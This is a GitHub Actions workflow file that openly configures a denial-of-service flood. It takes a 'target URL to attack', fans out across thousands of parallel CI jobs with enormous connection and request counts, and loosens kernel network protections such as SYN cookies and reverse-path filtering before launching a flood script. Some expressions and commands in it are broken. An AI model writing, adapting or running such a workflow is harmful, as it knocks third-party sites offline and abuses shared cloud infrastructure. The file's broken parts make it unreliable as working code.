name: kimochi
on:
  workflow_dispatch:
    inputs:
      target_url:
        description: 'Target URL to attack'
        required: true
        default: 'https://example.com'
      duration:
        description: 'Attack duration in seconds'
        required: true
        default: '300'
      workers:
        description: 'Number of workers per job'
        required: true
        default: '100000'
      connections:
        description: 'Connections per worker'
        required: true
        default: '100000'
      requests:
        description: 'Requests per connection'
        required: true
        default: '100000'
      jobs:
        description: 'Number of parallel jobs'
        required: true
        default: '10000'

jobs:
  flood:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        instance: ${{ fromJson(format('[{0}]', join(range(1, ${{ inputs.jobs }} + 1), ','))) }}
    steps:
      - uses: actions/checkout@v4
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.12'
      - name: Install Dependencies
        run: |
          pip install aiohttp scapy numpy uvloop psutil netifaces dnspython dpkt playwright asyncio subprocess
          sudo apt-get update
          sudo apt-get install -y python3-dev libpcap-dev
          playwright install
      - name: System Optimization
        run: |
          sudo sysctl -w net.core.rmem_max=4294967296
          sudo sysctl -w net.core.wmem_max=4294967296
          sudo sysctl -w net.ipv4.tcp_rmem="4096 87380 4294967296"
          sudo sysctl -w net.ipv4.tcp_wmem="4096 65536 4294967296"
          sudo sysctl -w net.core.netdev_max_backlog=10000000
          sudo sysctl -w net.ipv4.tcp_congestion_control=bbr
          sudo sysctl -w net.ipv4.tcp_tw_reuse=1
          sudo sysctl -w net.ipv4.tcp_fin_timeout=1
          sudo sysctl -w net.ipv4.tcp_keepalive_time=1
          sudo sysctl -w net.ipv4.tcp_max_syn_backlog=10000000
          sudo sysctl -w net.ipv4.tcp_syncookies=0
          sudo sysctl -w net.ipv4.ip_local_port_range="1024 65535"
          sudo sysctl -w fs.file-max=1000000000
          sudo sysctl -w net.ipv4.tcp_timestamps=0
          sudo sysctl -w net.ipv4.tcp_sack=1
          sudo sysctl -w net.ipv4.tcp_window_scaling=1
          sudo sysctl -w net.core.somaxconn=10000000
          sudo sysctl -w net.ipv4.tcp_max_tw_buckets=10000000
          sudo sysctl -w net.ipv4.tcp_fastopen=3
          sudo sysctl -w net.ipv4.ip_no_pmtu_disc=1
          sudo sysctl -w net.ipv4.tcp_low_latency=1
          sudo sysctl -w net.ipv4.tcp_mtu_probing=1
          sudo sysctl -w net.ipv4.tcp_fack=1
          sudo sysctl -w net.ipv4.tcp_retries2=5
          sudo sysctl -w net.ipv4.tcp_abort_on_overflow=1
          sudo sysctl -w net.ipv4.tcp_adv_win_scale=1
          sudo sysctl -w net.ipv4.tcp_app_win=31
          sudo sysctl -w net.ipv4.tcp_dsack=1
          sudo sysctl -w net.ipv4.tcp_ecn=0
          sudo sysctl -w net.ipv4.tcp_reordering=3
          sudo sysctl -w net.ipv4.tcp_max_orphans=262144
          sudo sysctl -w net.ipv4.tcp_mem="786432 1048576 1572864"
          sudo sysctl -w net.ipv4.udp_rmem_min=8192
          sudo sysctl -w net.ipv4.udp_wmem_min=8192
          sudo sysctl -w net.ipv4.conf.all.send_redirects=0
          sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
          sudo sysctl -w net.ipv4.conf.all.secure_redirects=0
          sudo sysctl -w net.ipv4.conf.all.log_martians=0
          sudo sysctl -w net.ipv4.conf.all.accept_source_route=0
          sudo sysctl -w net.ipv4.conf.all.rp_filter=0
          sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
          sudo sysctl -w net.ipv4.icmp_ignore_bogus_error_responses=1
          sudo sysctl -w kernel.threads-max=1000000
          sudo sysctl -w kernel.pid_max=4194304
          sudo sysctl -w vm.swappiness=10
          sudo sysctl -w vm.dirty_ratio=60
          sudo sysctl -w vm.dirty_background_ratio=2
          sudo ulimit -n 99999999
      - name: Run Attack
        env:
          TARGET_URL: ${{ inputs.target_url }}
          DURATION: ${{ inputs.duration }}
          MAX_WORKERS: ${{ inputs.workers }}
          CONNECTIONS_PER_WORKER: ${{ inputs.connections }}
          REQUESTS_PER_CONNECTION: ${{ inputs.requests }}
        run: python playwright_flood.py
